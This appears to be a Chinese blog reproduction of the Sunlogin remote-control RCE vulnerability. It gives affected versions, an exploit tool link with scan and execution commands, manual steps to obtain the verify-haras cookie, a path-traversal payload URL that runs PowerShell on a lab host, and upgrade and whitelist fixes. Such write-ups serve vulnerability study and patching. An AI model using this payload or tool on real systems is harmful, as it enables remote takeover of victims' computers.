向日葵rce命令执行
向日葵远程控制是一款提供远程控制服务的软件。其支持主流操作系统Windows、Linux、Mac、Android、iOS跨平台协同操作,在任何可连入互联网的地点,都可以轻松访问和控制安装了向日葵远程控制客户端的设备。整个远控过程,可通过浏览器直接进行,无需再安装软件。最近向日葵爆出了存在远程代码执行漏洞(CNVD-2022-10270/CNVD-2022-03672),影响Windows系统使用的个人版和简约版,攻击者可利用该漏洞获取服务器控制权。
一、环境
影响版本
向日葵个人版for Windows <= 11.0.0.33
向日葵简约版 <= V1.0.1.43315(2021.12)
环境准备
向日葵客户端版本号:10.3.0.27372下载地址:https://msoft.win10com.com/202005/SunloginClient_10.3.0.27372.zip利用漏洞工具下载:https://github.com/Mr-xn/sunlogin_rce/releases/tag/new工具命令:-h 指定目标-t 选择扫描或者命令执行 默认scan-p 设置扫描端口范围 默认4w到65535-c 需要执行的命令
二、工具复现过程
1、安转向日葵客户端:
2、使用工具检测
执行命令:xrKRce.exe -h 192.168.116.128 -t scan
3、命令执行
执行命令:xrKRce.exe -h 192.168.116.128 -t rce -p 49709 -c "whoami"
三、手动复现过程
端口探测
端口探测:开启向日葵并提示连接成功的时候会出现一个40000-60000的端口,这个时候我们可以利用御剑端口扫描工具进行扫描。
漏洞探测
漏洞探测:使用curl ip:[端口号] ,如下响应结果表示存在漏洞,没有回显表明漏洞不能被利用。
漏洞存在
确认存在漏洞后,浏览器访问ip:端口号+cgi-bin/rpc?action=verify-haras,获取cookie值。
命令执行
使用获取到的cookie修改请求包,利用特殊格式的发送执行命令,如’whoami’,请求尝试看是否可以获取到主机名称,如果有回显则证明这个漏洞成功复现。
Payload:http://192.168.116.128:49709/check?cmd=ping..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fsystem32%2FWindowsPowerShell%2Fv1.0%2Fpowershell.exe+%20whoami
四、修复方案
升级版本修复
向日葵官方已发布了修复版本,请及时更新:https://sunlogin.oray.com/
设置白名单
如果目前无法升级,在业务环境允许的情况下,使用白名单限制web端口的访问来降低风险。
• 往期精选
下方点击关注发现更多精彩!
原文始发于微信公众号(银河护卫队super):向日葵rce复现(CNVD-2022-03672)
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论